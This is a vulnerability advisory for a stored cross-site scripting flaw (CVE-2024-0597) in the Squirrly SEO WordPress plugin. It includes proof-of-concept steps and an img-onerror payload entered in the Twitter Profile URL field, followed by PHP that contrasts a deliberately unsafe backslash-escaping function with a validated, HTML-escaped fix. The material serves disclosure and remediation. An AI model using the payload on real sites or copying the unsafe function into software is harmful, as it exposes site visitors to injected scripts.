CVE-2024-0597 — SEO Plugin by Squirrly SEO WP Plugin <= 12.3.15 Administrator+ Stored Cross-Site Scripting

The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

Proof of Concept

  1. When the plugin is installed, open the OnePage Setup page (/wp-admin/admin.php?page=sq_onpagesetup)
  2. In step 4 (OnePage Setup), enter the payload in the Twitter Profile URL input field: https://twitter.com/twitter\"><img src onerror=alert(123)>
  3. Complete the setup process, then open your WordPress page.

The XSS payload will be triggered in the Twitter meta tag section:

<meta property="twitter:creator" content="@twitter\\"><img src onerror=alert(123)>" />
<meta property="twitter:site" content="@twitter\\"><img src onerror=alert(123)>" />

Impact

This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
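The meta tags above show the root cause: the quote in the stored value was backslash-escaped, but HTML attributes do not treat a backslash as an escape character, so the double quote still terminates the content attribute. The following PHP is an added illustration, not the plugin's code; the function names are hypothetical, and in a WordPress plugin esc_attr() would take the place of htmlspecialchars().

```php
<?php
// Added example (not Squirrly SEO's code): why backslash-escaping does not
// protect an HTML attribute, and how to render the Twitter meta tag safely.

// Constructed sample input: the payload from the advisory above.
$input = 'https://twitter.com/twitter\"><img src onerror=alert(123)>';

// Weak: derive "@handle" from the URL and only backslash-escape it.
// addslashes() turns `"` into `\"`, but a browser still reads the `"`
// as the end of the attribute, so the injected tag is rendered.
function twitter_meta_weak(string $url): string {
    $handle = '@' . preg_replace('#^https?://(www\.)?twitter\.com/#i', '', $url);
    return '<meta property="twitter:creator" content="' . addslashes($handle) . '" />';
}

// Hardened, step 1: validate on input. A Twitter handle is 1-15 word
// characters, so anything else in the URL path is rejected outright.
function twitter_handle(string $url): ?string {
    $path = parse_url(trim($url), PHP_URL_PATH);
    if ($path === null || $path === false) {
        return null;
    }
    $handle = ltrim($path, '/');
    if (!preg_match('/^[A-Za-z0-9_]{1,15}$/', $handle)) {
        return null; // not a plain handle: do not store or render it
    }
    return '@' . $handle;
}

// Hardened, step 2: escape for the HTML-attribute context at output time,
// even though the value was validated (defence in depth).
function twitter_meta_safe(string $url): string {
    $handle = twitter_handle($url);
    if ($handle === null) {
        return ''; // emit nothing rather than an untrusted value
    }
    $escaped = htmlspecialchars($handle, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<meta property="twitter:creator" content="' . $escaped . '" />';
}

echo twitter_meta_weak($input), "\n";                      // attribute broken out of
echo twitter_meta_safe($input), "\n";                      // payload rejected, empty
echo twitter_meta_safe('https://twitter.com/twitter'), "\n"; // well-formed tag
```

The same two steps apply to the twitter:site tag and to any other setting the plugin echoes into page markup: validate against the expected shape on save, and escape for the exact output context on render.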